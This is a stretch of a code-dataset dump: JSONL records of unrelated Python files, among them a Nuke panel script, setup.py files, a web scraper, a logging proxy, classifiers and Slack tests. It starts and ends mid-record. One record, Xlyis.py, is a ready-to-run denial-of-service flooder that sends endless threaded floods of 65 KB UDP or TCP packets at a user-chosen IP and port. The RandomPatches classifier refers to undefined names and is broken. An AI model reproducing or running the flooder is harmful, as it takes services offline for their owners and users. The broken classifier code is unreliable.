self.yadd )\r\n\r\n def replace( self ):\r\n nodenames = self.nodenames.value()\r\n parameter = self.parameter.value()\r\n istart = self.istart.value()\r\n iend = self.iend.value()\r\n xfactor = self.xfactor.value()\r\n yfactor = self.yfactor.value()\r\n xadd = self.xadd.value()\r\n yadd = self.yadd.value()\r\n\r\n for i in range( istart , iend + 1 ):\r\n inode = nuke.toNode( nodenames + str(i) )\r\n if inode:\r\n iparamx = inode.knob( parameter ).getValue( 0 )\r\n iparamy = inode.knob( parameter ).getValue( 1 )\r\n if iparamx == iparamy and xfactor == yfactor and xadd == yadd: #only one scale value\r\n inode.knob( parameter ).setValue( iparamx * xfactor + xadd )\r\n else: #separate values for x and y\r\n inode.knob( parameter ).setValue( iparamx * xfactor + xadd , 0 )\r\n inode.knob( parameter ).setValue( iparamy * yfactor + yadd , 1 )\r\n\r\n def showModalDialog( self ):\r\n result = nukescripts.PythonPanel.showModalDialog( self )\r\n if result:\r\n self.replace()\r\n\r\n\r\n ParameterReplace().showModalDialog()\r\n","sub_path":"python-scripts/ParameterReplace.py","file_name":"ParameterReplace.py","file_ext":"py","file_size_in_byte":3290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"608328709","text":"#!/usr/bin/python\n# -*- coding: utf8 -*-\nimport os\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nsetup(\n name='screamshotter',\n version='1.1.2',\n author='Mathieu Leplatre',\n author_email='mathieu.leplatre@makina-corpus.com',\n url='https://github.com/makinacorpus/django-screamshot',\n description='Web pages capture server',\n long_description='',\n install_requires=[\n 'django-screamshot',\n 'django>=1.11',\n ],\n packages=find_packages(),\n include_package_data=True,\n classifiers=['Natural Language :: English',\n 'Operating System :: OS Independent',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Programming Language :: Python :: 2.7'],\n)\n","sub_path":"pypi_install_script/screamshotter-1.1.2.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"48446188","text":"#!/usr/bin/python\n# coding=utf-8\n\nimport os\nfrom shutil import copyfile, move\nfrom os.path import join\n\nimport cv2\n\nfrom get_blurry_res.get_blurry_res import get_blurry_res\n\n\ndef move_by_blurry(src_dir, blurry_dir, clear_dir, blurry_thr):\n \"\"\"\n 根据blurry 移动图片\n :return:\n \"\"\"\n t = cv2.IMWRITE_JPEG_QUALITY\n for im_name in os.listdir(src_dir):\n if im_name.endswith('.jpg'):\n src_path = join(src_dir, im_name)\n bl_res = get_blurry_res(cv2.imread(src_path, cv2.IMREAD_GRAYSCALE))\n if bl_res > blurry_thr:\n dst_path = join(clear_dir, im_name)\n else:\n dst_path = join(blurry_dir, im_name)\n move(src_path, dst_path)\n\n\ndef refresh(src_dir, blurry_dir, clear_dir):\n for fn in os.listdir(blurry_dir):\n move(join(blurry_dir, fn), join(src_dir, fn))\n for fn in os.listdir(clear_dir):\n move(join(clear_dir, fn), join(src_dir, fn))\n\n \ndef make_dir(dir_path):\n if not os.path.exists(dir_path):\n os.mkdir(dir_path)\n return dir_path\n\n\nif __name__ == '__main__':\n src_dir = '/disk_workspace/train_data_for_svm/tgde_samples20191126/C_TGDE_PT'\n blurry_dir = make_dir(join(src_dir, 'blurry'))\n clear_dir = make_dir(join(src_dir, 'clear'))\n blurry_thr = 2\n move_by_blurry(src_dir, blurry_dir, clear_dir, blurry_thr)\n # refresh(src_dir, blurry_dir, clear_dir)\n","sub_path":"opencv_demos/pick_samples/move_img_by_blurry.py","file_name":"move_img_by_blurry.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"133247141","text":"from bs4 import BeautifulSoup as bs\nimport yaml\nimport requests\nfrom datetime import datetime\n\nclass OlympiadaRu():\n def __init__(self, matches):\n self.SERVER = 'https://info.olimpiada.ru'\n self.BASE_URL_CURRENT='https://info.olimpiada.ru/current/page/{}?subject%5B{}%5D=on&class%5B{}%5D=on&dtype%5B{}%5D=on'\n self.BASE_URL_NEXT = 'https://info.olimpiada.ru/events/page/{}?subject%5B{}%5D=on&class%5B{}%5D=on&type%5B{}%5D=on'\n self.HEADERS = {\n 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',\n 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n }\n\n self.NUMBERS = ['first', 'second', 'third', 'forth', 'fifth', 'sixth', 'seventh', 'eighth', 'ninth', 'tenth']\n self.KEYWORDS = ['финал', 'Финал', 'Заключительн', 'заключительн']\n self.TYPEWORDS = ['очная', 'личная', 'конференция', 'заочная', 'все типы']\n\n self.matches = matches\n self.SUBJECTS = matches['subjects-olru']\n self.TYPES = matches['types-olru']\n \n def handle_event(self, row):\n result = {\n 'title': 'Title',\n 'stage': 'selection',\n 'subjects': [],\n 'id': -1,\n 'infourl': None,\n 'date_start': '01.01.1970',\n 'date_end': '01.01.1970',\n 'classes': [0],\n 'link': None\n }\n \n link_raw = row.find_all('td')[1].find('a')\n url = self.SERVER + link_raw['href']\n result['title'] = link_raw.text\n\n result['stage'] = 'selection'\n for keyword in self.KEYWORDS:\n if keyword in result['title']:\n result['stage'] = 'final'\n break\n\n subjects_raw = row.find('div', class_='div_selected_subjects')\n subjects = []\n if subjects_raw != None:\n subjects_spans = subjects_raw.find_all('span')\n for item in subjects_spans:\n subjects.append(item.text)\n else:\n try:\n subjects_raw = row.find('span', class_='span_filtered')\n subjects.append(subjects_raw.text.split(' | ')[2])\n except:\n subjects.append(row.find_all('td')[1].text.split(' | ')[1])\n \n result['subjects'] = subjects\n\n if 'тип' in result['subjects'][0]:\n result['subjects'] = []\n for typeword in self.TYPEWORDS:\n if typeword in result['subjects']:\n subjects.append(typeword)\n \n if len(result['subjects']) == 0:\n result['subjects'].append('Любой предмет')\n\n\n eventID = int(link_raw['href'].split('/')[-1])\n result['id'] = eventID\n result['infourl'] = url\n\n print('='*30)\n print('Parsing event ' + str(eventID) + ', ' + url)\n\n request = requests.get(url, headers=self.HEADERS)\n soup = bs(request.content, 'html.parser', from_encoding='utf-8')\n\n data = soup.find('div', class_='main')\n deadlines_raw = data.find('font')\n result['date_start'] = deadlines_raw.text.split(' - ')[0]\n\n try:\n result['date_end'] = deadlines_raw.text.split(' - ')[1]\n except:\n result['date_end'] = result['date_start']\n info_table = data.find('table', class_='event_info_table')\n info_table_rows = info_table.find_all('tr')\n for item in info_table_rows:\n name = item.find_all('td')[0].text\n if name == 'Классы':\n classes_raw = item.find_all('td')[1].text\n if ',' in classes_raw:\n \tclasses_raw = classes_raw.split(',')\n else:\n \tclasses_raw = classes_raw.split('-')\n classes = []\n for i in range(int(classes_raw[0]), int(classes_raw[-1])+1):\n classes.append(i)\n result['classes'] = classes\n elif name == 'Ссылка':\n result['link'] = item.find_all('td')[1].find('a')['href']\n \n # NOTE: deprecated code\n #-- check if this event is new\n #event_day = result['date_start'].split('.')[0]\n #event_month = result['date_start'].split('.')[1]\n #if (event_day == datetime.now().day) and (event_month == datetime.now().month):\n # self.mservice.send_event_notifications(result['subjects'], url)\n return result\n\n\n def get_next_events(self, subject=-1, schclass=-1):\n result = []\n if schclass == -1: schclass='%'\n\n url = self.BASE_URL_NEXT.format(1, self.SUBJECTS[str(subject)], schclass, self.TYPES['-1'])\n\n # make request\n session = requests.Session()\n request = session.get(url, headers=self.HEADERS)\n\n if request.status_code == 200:\n soup = bs(request.content, 'html.parser', from_encoding='utf-8')\n elements = []\n for i in range(10):\n try:\n ul = soup.find('ul', class_=self.NUMBERS[i])\n elements += ul.find_all('li')\n except:\n pass \n if len(elements) == 0:\n return result\n for item in elements:\n if item.find('table') != None:\n result.append(self.handle_event(item.find('tr')))\n \n counter = soup.find('ul', {'id': 'counter'})\n\n if counter != None:\n pages_amount = int(counter.find_all('li')[-2].find('a').text)\n for i in range(2, pages_amount+1):\n url = self.BASE_URL_NEXT.format(i, self.SUBJECTS[str(subject)], schclass, self.TYPES['-1'])\n request = session.get(url, headers=self.HEADERS)\n soup = bs(request.content, 'html.parser', from_encoding='utf-8')\n rows = []\n elements = []\n for i in range(10):\n try:\n ul = soup.find('ul', class_=self.NUMBERS[i])\n elements += ul.find_all('li')\n except:\n pass\n for item in elements:\n if item.find('table') != None:\n rows.append(item.find('tr'))\n for row in rows:\n result.append(self.handle_event(row))\n return result\n \n\n\n def get_current_events(self, subject=-1, schclass=-1, oltype=-1):\n result = []\n if schclass == -1: schclass = '%'\n\n url = self.BASE_URL_CURRENT.format(1, self.SUBJECTS[str(subject)], schclass, self.TYPES[str(oltype)])\n\n # make request\n session = requests.Session()\n request = session.get(url, headers=self.HEADERS)\n\n if request.status_code == 200:\n soup = bs(request.content, 'html.parser', from_encoding='utf-8')\n table = soup.find('table', {'style': 'margin-left:40px'})\n rows = table.find_all('tr')\n if len(rows) == 0:\n return result\n for row in rows:\n result.append(self.handle_event(row))\n\n counter = soup.find('ul', {'id': 'counter'})\n if counter != None:\n pages_amount = int(counter.find_all('li')[-2].find('a').text)\n for i in range(2, pages_amount+1):\n url = self.BASE_URL_CURRENT.format(i, self.SUBJECTS[str(subject)], schclass, self.TYPES[str(oltype)])\n request = session.get(url, headers=self.HEADERS)\n soup = bs(request.content, 'html.parser', from_encoding='utf-8')\n table = soup.find('table', {'style': 'margin-left:40px'})\n rows = table.find_all('tr')\n for row in rows:\n result.append(self.handle_event(row))\n\n session.close()\n return result","sub_path":"src/parser/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":8142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"45589672","text":"#!/usr/bin/env python\n\nimport sys\nimport logging\nimport threading\nimport BaseHTTPServer\n\nfrom LoggingProxyHTTPHandler import LoggingProxyHTTPHandler\n\nclass ThreadedHTTPServer(BaseHTTPServer.HTTPServer):\n def process_request(self, request, client_address):\n thread = threading.Thread(target=self.__new_request, args=(self.RequestHandlerClass, request, client_address, self))\n thread.start()\n def __new_request(self, handlerClass, request, address, server):\n handlerClass(request, address, server)\n self.shutdown_request(request)\n\n#server = ThreadedHTTPServer(('', 80), Handler)\n#server.serve_forever()\n\ndef main(args):\n try:\n port = int(args[1])\n except IndexError:\n port = 8000\n server_address = ('', port)\n\n # Create logger\n logger = logging.getLogger('http proxy')\n logger.setLevel(logging.DEBUG)\n # create file handler which logs even debug messages\n fh = logging.FileHandler('proxy.log')\n fh.setLevel(logging.DEBUG)\n # create console handler with a higher log level\n #ch = logging.StreamHandler()\n #ch.setLevel(logging.ERROR)\n # create formatter and add it to the handlers\n formatter = logging.Formatter('=' * 78 + '\\n%(asctime)s - %(threadName)s - %(name)s - %(levelname)s\\n' + '=' * 78 + '\\n%(message)s')\n #ch.setFormatter(formatter)\n fh.setFormatter(formatter)\n # add the handlers to logger\n #logger.addHandler(ch)\n logger.addHandler(fh)\n\n httpd = ThreadedHTTPServer(server_address, LoggingProxyHTTPHandler)\n httpd.serve_forever()\n\nif __name__ == '__main__':\n sys.exit(main(sys.argv))\n","sub_path":"proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"145177406","text":"import numpy as np\nfrom sklearn.base import BaseEstimator, ClassifierMixin\nfrom sklearn.utils.validation import check_X_y, check_array, check_is_fitted\nfrom RandomNumberGenerator import RandomNumberGenerator\nfrom sklearn.base import clone\n\nclass RandomPatches(BaseEstimator, ClassifierMixin):\n \"\"\"\n Implementacja random patches\n\n Parameters\n ----------\n base_estimator : base_estimator (Default = None)\n Deklaracja klasyfikatora bazowego\n\n n_estimators : int (Default = 10)\n Liczba klasyfikatorów\n \n random_state : int (Default = None)\n Ziarno losowe\n \n subset_size : int (Default = 50)\n Ilość wzorców w pojedyńczym bagu\n \n \n \"\"\"\n def __init__(self, base_estimator = None, n_estimators = 10, random_state = None, subset_size = 50):\n self.base_estimator = base_estimator\n self.n_estimators = n_estimators\n self.random_state = random_state\n self.subset_size = subset_size\n \n def fit(self, X, y):\n X, y = check_X_y(X, y)\n self.classes_ = np.unique(y)\n self.X_, self.y_ = X, y\n if not hasattr(self, \"ensemble_\"):\n self.ensemble_ = []\n \n balance_ratio = np.sum(self.y_)/len(self.y_)\n dataset = self.X_\n dataset = np.append(dataset, self.y_, axis=1)\n \n for base_clf in range(self.n_estimators):\n subset = np.empty((0,self.X_.shape[1]+1))\n \n \n feature_subspace_size = RandomGenerator.nextInt(1, self.X_.shape[1])\n Subspace = np.empty((self.X_.shape[0],0))\n \n for feature in range(feature_subspace_size):\n Subspace = np.append(Subspace, np.reshape(self.X_[:, RandomGenerator.nextInt(0, feature_subspace_size - 1) ], (self.X_.shape[0],1)), axis=1)\n \n for sample in range(subset_size):\n draw_index = np.random.randint(0, len(self.X_))\n random_sample = dataset[draw_index]\n \n if sample == 0:\n subset = np.append(subset, random_sample, axis = 0)\n continue\n if np.sum(subset[:, -1])/len(subset) > balance_ratio:\n if random_sample[-1] == 0:\n subset = np.append(subset, random_sample, axis = 0)\n else:\n while(random_sample[-1] != 0):\n draw_index = np.random.randint(0, len(self.X_))\n random_sample = dataset[draw_index]\n subset = np.append(subset, random_sample, axis = 0) \n \n else:\n if random_sample[-1] == 1:\n subset = np.append(subset, random_sample, axis = 0)\n else:\n while(random_sample[-1] != 1):\n draw_index = np.random.randint(0, len(self.X_))\n random_sample = dataset[draw_index]\n subset = np.append(subset, random_sample, axis = 0)\n \n X = dataset[:, :-1]\n y = dataset[:, -1].astype(int)\n \n model = clone(self.base_estimator).fit(X, y)\n self.ensemble_.append(model)\n \n \n \n \n return self\n \n def predict(self, X):\n y_pred = [] \n \n for x_query in X:\n votes = []\n \n for Clf in self.ensemble_:\n votes.append(Clf.predict(x_query.reshape(1, -1)))\n \n if np.sum(votes) / self.n_estimators > 0.5:\n y_pred.append(1)\n \n else:\n y_pred.append(0)\n \n \n return y_pred","sub_path":"RandomPatches.py","file_name":"RandomPatches.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"108022134","text":"#!/usr/bin/env python3\r\n#Code by Xlyis\r\nimport random\r\nimport socket\r\nimport threading\r\n\r\nip = str(input(\"IP>\"))\r\nport = int(input(\"PORT>\"))\r\nchoice = str(input(\"METHOD>\"))\r\ntimes = int(input(\"BYTES>\"))\r\nthreads = int(input(\"THREADS>\"))\r\ndef run():\r\n\tdata = random._urandom(65503)\r\n\ti = random.choice((\"\",\"\",\"\"))\r\n\twhile True:\r\n\t\ttry:\r\n\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\t\t\taddr = (str(ip),int(port))\r\n\t\t\tfor x in range(times):\r\n\t\t\t\ts.sendto(data,addr)\r\n\t\t\tprint(i +\"Attack To %s:%s BY LNVRH\"%(ip,port))\r\n\t\texcept:\r\n\t\t\tprint(\"[!] Error!!!\")\r\n\r\ndef run2():\r\n\tdata = random._urandom(65500)\r\n\ti = random.choice((\"\",\"\",\"\"))\r\n\twhile True:\r\n\t\ttry:\r\n\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\t\t\ts.connect((ip,port))\r\n\t\t\ts.send(data)\r\n\t\t\tfor x in range(times):\r\n\t\t\t\ts.send(data)\r\n\t\t\tprint(i +\"Attack To %s:%s BY LNVRH\"%(ip,port))\r\n\t\texcept:\r\n\t\t\ts.close()\r\n\t\t\tprint(\"[*] Error\")\r\n\r\nfor tcp in range(threads):\r\n\tif choice == 'tcp':\r\n\t\tth = threading.Thread(target = run)\r\n\t\tth.start()\r\n\telse:\r\n\t\tth = threading.Thread(target = run2)\r\n\t\tth.start()","sub_path":"Xlyis.py","file_name":"Xlyis.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"653360739","text":"from ez_setup import use_setuptools\nuse_setuptools()\n\nfrom setuptools import setup, find_packages\nREADME = open('README.txt').read()\n\nversion = '0.1'\n\nsetup(name='Products.rpcauth',\n version = version,\n description = \"Authentication queries to Zope over XML-RPC\",\n long_description = README,\n classifiers=[\n \"Programming Language :: Python\",\n ],\n keywords = '',\n author = 'Agendaless Consulting, Inc.',\n author_email='mailto:tseaver@agendaless.com',\n license='ZPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['Products'],\n include_package_data=True,\n zip_safe=False,\n test_suite=\"Products.rpcauth.tests\",\n tests_require = [\n #'repoze.who',\n ],\n install_requires=[\n 'setuptools',\n 'Products.PluggableAuthService',\n ],\n )\n","sub_path":"pypi_install_script/Products.rpcauth-0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"507200797","text":"#!/usr/bin/env python3\n\n\"\"\"\nFile: classify_gender.py\n------------------------\nScript for classifying gender using face embeddings.\n\nExample #1: Single\n------------------\n\n in_path: my_output_dir\n out_path: my_output_dir\n\n where 'my_output_dir' contains 'embeddings.json'\n\n outputs\n\n my_output_dir/\n └── genders.json\n\n\nExample #2: Batch\n-----------------\n\n in_path: my_output_dir\n out_path: my_output_dir\n \n where 'my_output_dir' contains video output subdirectories\n\n outputs \n\n my_output_dir/\n ├── my_video1\n │   └── genders.json\n └── my_video2\n    └── genders.json\n\n\"\"\"\n\nimport argparse\nfrom multiprocessing import Pool\nimport os\n\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn.neighbors import KNeighborsClassifier\n\nfrom util.utils import save_json, load_json, get_base_name\nfrom util.consts import OUTFILE_EMBEDS, OUTFILE_GENDERS\n\nGENDER_TRAIN_X_FILE = 'gender_model/train_X.npy'\nGENDER_TRAIN_Y_FILE = 'gender_model/train_y.npy'\nKNN_K = 7\n\ntrain_X = np.load(GENDER_TRAIN_X_FILE)\ntrain_y = np.load(GENDER_TRAIN_Y_FILE)\nclf = KNeighborsClassifier(KNN_K)\nclf.fit(train_X, train_y)\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('in_path', type=str,\n help='path to directory of video outputs')\n parser.add_argument('out_path', type=str,\n help='path to output directory')\n parser.add_argument('-f', '--force', action='store_true',\n help='force overwrite existing output')\n parser.add_argument('-s', '--single', action='store_true', \n help='single video (as opposed to batch)')\n return parser.parse_args()\n\n\ndef main(in_path, out_path, force=False, single=False):\n # Check whether input is single or batch\n if single:\n if not os.path.isdir(out_path):\n os.makedirs(out_path)\n\n pbar = tqdm(total=1, desc='Classifying genders', unit='video')\n embeds_path = os.path.join(in_path, OUTFILE_EMBEDS)\n if not os.path.exists(embeds_path):\n print('No face embeddings available, skipping gender classification')\n pbar.update()\n return\n\n genders_outpath = os.path.join(out_path, OUTFILE_GENDERS)\n if force or not os.path.exists(genders_outpath):\n process_single(embeds_path, genders_outpath)\n \n pbar.update()\n return\n else:\n video_names = list(os.listdir(in_path))\n out_paths = [os.path.join(out_path, name) for name in video_names]\n \n for p in out_paths:\n if not os.path.isdir(p):\n os.makedirs(p)\n \n with Pool() as workers, tqdm(\n total=len(video_names), desc='Classifying genders', unit='video'\n ) as pbar:\n for video_name, output_dir in zip(video_names, out_paths):\n embeds_path = os.path.join(in_path, video_name, OUTFILE_EMBEDS)\n genders_outpath = os.path.join(output_dir, OUTFILE_GENDERS)\n if force or not os.path.exists(genders_outpath):\n workers.apply_async(\n process_single,\n args=(embeds_path, genders_outpath),\n callback=lambda x: pbar.update())\n else:\n pbar.update()\n\n workers.close()\n workers.join()\n\n\ndef process_single(in_file, out_file):\n # Load the detected faces and embeddings and run the classifier\n result = [(face_id, predict_gender(embed), predict_gender_score(embed))\n for face_id, embed in load_json(in_file)]\n\n save_json(result, out_file)\n\n\ndef predict_gender(x):\n return 'F' if clf.predict([x]) == 1 else 'M'\n\n\ndef predict_gender_score(x):\n # FIXME: this was not tested. Need to check if this is sane\n return max(clf.predict_proba([x])[0])\n\n\nif __name__ == '__main__':\n main(**vars(get_args()))\n","sub_path":"components/classify_gender.py","file_name":"classify_gender.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"270766255","text":"import zeep\n\n\nclient = zeep.Client(\n wsdl='http://localhost:8080/webservices/chelyabinsk_household_info.wsdl'\n)\n\nticket_id = '551989'\n\nresult = client.service.getResultRequest(\n Message={\n 'Sender': {\n 'Code': 'testcode',\n 'Name': 'testname',\n },\n 'Recipient': {\n 'Code': 'ISMV01001',\n 'Name': 'test',\n },\n 'Originator': {\n 'Code': 'RRTR01001',\n 'Name': 'test',\n },\n 'ServiceName': 'test_service_name',\n 'TypeCode': 'test_type',\n 'Status': 'REQUEST',\n 'Date': '2017-11-27T06:21:51.063+03:00',\n 'ExchangeType': 2,\n 'CaseNumber': '74/011/201/2017-2689',\n },\n MessageData={\n 'AppData': {\n 'ApplicationData': {\n 'getResultRequest': {\n 'ticketId': ticket_id\n },\n },\n },\n },\n)\n\nprint(result.AppData.ApplicationData.getResultResponse)\n","sub_path":"success_result.py","file_name":"success_result.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"313237136","text":"#!/usr/bin/env python3\n\nimport requests, json\nfrom pyarubacentral import auth\n\ndef get_networks(sessiondata):\n url = \"https://app1-apigw.central.arubanetworks.com/monitoring/v1/networks\"\n payload = {'access_token': sessiondata['access_token']}\n headers = {\"Accept\": \"application/json\"}\n\n response = requests.get(url, params=payload, headers=headers)\n\n return response.json()\n","sub_path":"pyarubacentral/get_networks.py","file_name":"get_networks.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"200960349","text":"# -*- coding:utf-8 -*-\n''''''\n\n\n'''\n\n聊天室\n\n'''\n\nimport socket,time\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\nuserSock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nsendAddress = ('127.0.0.1',8080)\nrecAddress = ('',8899)\n\nuserSock1.bind(recAddress)\n\nwhile True:\n\n sendMsg = raw_input('Input Msg:')\n\n userSock1.sendto(sendMsg.encode('utf-8'), sendAddress)\n\n user1RecMsg = userSock1.recvfrom(1024)\n\n print('%s : %s' % (time.ctime(), user1RecMsg))\n\n\nuserSock1.close()","sub_path":"Exercise/网络编程/udp/聊天室.py","file_name":"聊天室.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"291908853","text":"\nmaand = int(input('Maand: '))\n\ndef seizoen(maand):\n if maand >= 0 and maand <=2:\n antwoord = 'Winter'\n elif maand >= 3 and maand <=5:\n antwoord = 'Lente'\n elif maand >= 6 and maand <=8:\n antwoord = 'Zomer'\n elif maand >= 9 and maand <=11:\n antwoord = 'Herfst'\n else:\n antwoord = 'Error'\n return antwoord\n\nprint(seizoen(maand))","sub_path":"Les6/pe6_1.py","file_name":"pe6_1.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"222303876","text":"def init(job):\n from JumpScale.baselib.atyourservice81.AtYourServiceBuild import ensure_container\n ensure_container(job.service, root=False)\n\n\ndef install(job):\n from JumpScale.baselib.atyourservice81.AtYourServiceBuild import build\n\n def build_func(cuisine):\n service = job.service\n cuisine.tools.sandbox.cleanup()\n\n\n js_script = r\"\"\"\n from JumpScale import j\n paths = []\n paths.append(\"/usr/lib/python3/dist-packages\")\n paths.append(\"/usr/lib/python3.5/\")\n paths.append(\"/usr/local/lib/python3.5/dist-packages\")\n base_dir = j.tools.cuisine.local.core.dir_paths['base']\n dest = j.sal.fs.joinPaths(base_dir, 'lib')\n excludeFileRegex = [\"-tk/\", \"/lib2to3\", \"-34m-\", \".egg-info\", \"lsb_release\"]\n excludeDirRegex = [\"/JumpScale\", \"\\.dist-info\", \"config-x86_64-linux-gnu\", \"pygtk\"]\n for path in paths:\n j.tools.sandboxer.copyTo(path, dest, excludeFileRegex=excludeFileRegex, excludeDirRegex=excludeDirRegex)\n j.tools.sandboxer.copyTo('/usr/local/bin/', '%s/bin/' % base_dir, excludeFileRegex=excludeFileRegex, excludeDirRegex=excludeDirRegex)\n if not j.sal.fs.exists(\"%s/bin/python\" % base_dir):\n j.sal.fs.symlink(\"%s/bin/python3\" % base_dir, \"%s/bin/python3.5\" % base_dir, overwriteTarget=True)\n j.tools.sandboxer.sandboxLibs(\"%s/lib\" % base_dir, recursive=True)\n j.tools.sandboxer.sandboxLibs(\"%s/bin\" % base_dir, recursive=True)\n \"\"\"\n cuisine.core.execute_jumpscript(js_script)\n\n sshkey = service.producers['sshkey'][0]\n cuisine.core.file_write(\"/root/.ssh/store_rsa\", sshkey.model.data.keyPriv)\n cuisine.core.file_attribs('/root/.ssh/store_rsa', mode='0600')\n\n upload = r\"\"\"\n from JumpScale import j\n j.do.loadSSHKeys('/root/.ssh/store_rsa')\n stor_exec = j.tools.executor.getSSHBased('{store_addr}')\n stor_cuisine = j.tools.cuisine.get(stor_exec)\n ### upload to stor\n sp = stor_cuisine.tools.stor.getStorageSpace('{namespace}')\n sp.upload('{flist}', source='{source}', excludes=['/__pycache__/', '(.*)\\\\.pyc$', '^\\/opt\\/code.*'])\n \"\"\".format(\n store_addr=service.model.data.storeAddr,\n namespace=service.model.data.namespace,\n source=service.model.data.sandboxPath,\n flist=service.model.data.flistName)\n\n cuisine.core.execute_jumpscript(upload)\n\n build(job.service, build_func)\n\n\ndef processChange(job):\n service = job.service\n args = job.model.args\n\n try:\n change_category = args.pop('changeCategory')\n except KeyError:\n # changeCategory not in args. we can't decide what to do\n return\n\n if change_category == 'dataschema':\n for key, value in args.items():\n capnp_key = j.data.hrd.sanitize_key(key)\n setattr(service.model.data, capnp_key, value)\n service.saveAll()\n","sub_path":"actorTemplates/packager/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"139640905","text":"import unittest\n\nfrom django.test import Client\n\nimport requests_mock\n\n\nclass SimpleTest(unittest.TestCase):\n def _call(self):\n response = Client().get('/slackin')\n self.assertEqual(response.status_code, 200)\n return response\n\n def test_nominal(self):\n with requests_mock.mock() as m:\n m.post('//slack.com/api/team.info', json=TEAM_INFO_RESPONSE)\n m.post('//slack.com/api/users.list', json=USERS_LIST_RESPONSE)\n\n response = self._call()\n\n self.assertIn(\n b'0 users online now of 2 registered.',\n response.content,\n )\n\n def test_throttled(self):\n with requests_mock.mock() as m:\n m.post('//slack.com/api/team.info', json=RATE_LIMITED_RESPONSE, status_code=429)\n m.post('//slack.com/api/users.list', json=RATE_LIMITED_RESPONSE, status_code=429)\n\n response = self._call()\n\n self.assertIn(\n b'-1 users online now of -1 registered.',\n response.content,\n )\n\n def test_error(self):\n with requests_mock.mock() as m:\n m.post('//slack.com/api/team.info', json={'ok': False, 'error': 'some-error'})\n m.post('//slack.com/api/users.list', json={'ok': False, 'error': 'some-error'})\n\n response = self._call()\n\n self.assertIn(\n b'-1 users online now of -1 registered.',\n response.content,\n )\n\n\nRATE_LIMITED_RESPONSE = {\n 'ok': False,\n 'error': 'ratelimited',\n 'headers': {\n 'Content-Type': 'application/json; charset=utf-8',\n 'Content-Length': '34',\n 'Connection': 'keep-alive',\n 'Access-Control-Allow-Origin': '*',\n 'Cache-Control': 'private, no-cache, no-store, must-revalidate',\n 'Date': 'Thu, 08 Mar 2018 02:19:26 GMT',\n 'Expires': 'Mon, 26 Jul 1997 05:00:00 GMT',\n 'Pragma': 'no-cache',\n 'Referrer-Policy': 'no-referrer',\n 'Retry-After': '9',\n 'Server': 'Apache',\n 'Strict-Transport-Security': 'max-age=31536000; includeSubDomains; preload',\n 'X-Content-Type-Options': 'nosniff',\n 'X-OAuth-Scopes': 'identify,read,post,client,apps,admin',\n 'X-Slack-Backend': 'h',\n 'X-Slack-Req-Id': 'ba437519-e114-49fd-99ae-ff30de936b6d',\n 'X-XSS-Protection': '0',\n 'X-Cache': 'Error from cloudfront',\n 'Via': '1.1 5f0ff016085532665645d41b997a1c90.cloudfront.net (CloudFront)',\n 'X-Amz-Cf-Id': 'EmRATI3hHeGMYiw-MNiG0FhGO79ZkAPz0fYYzrSaDTHbxHk_y7K4pw==',\n },\n}\n\nTEAM_INFO_RESPONSE = {\n 'ok': True,\n 'team': {\n 'id': 'T12345',\n 'name': 'My Team',\n 'domain': 'example',\n 'email_domain': 'example.com',\n 'icon': {\n 'image_34': 'https:\\/\\/...',\n 'image_44': 'https:\\/\\/...',\n 'image_68': 'https:\\/\\/...',\n 'image_88': 'https:\\/\\/...',\n 'image_102': 'https:\\/\\/...',\n 'image_132': 'https:\\/\\/...',\n 'image_default': True\n },\n 'enterprise_id': 'E1234A12AB',\n 'enterprise_name': 'Umbrella Corporation'\n }\n}\n\nUSERS_LIST_RESPONSE = {\n 'ok': True,\n 'members': [\n {\n 'id': 'W012A3CDE',\n 'team_id': 'T012AB3C4',\n 'name': 'spengler',\n 'deleted': False,\n 'color': '9f69e7',\n 'real_name': 'spengler',\n 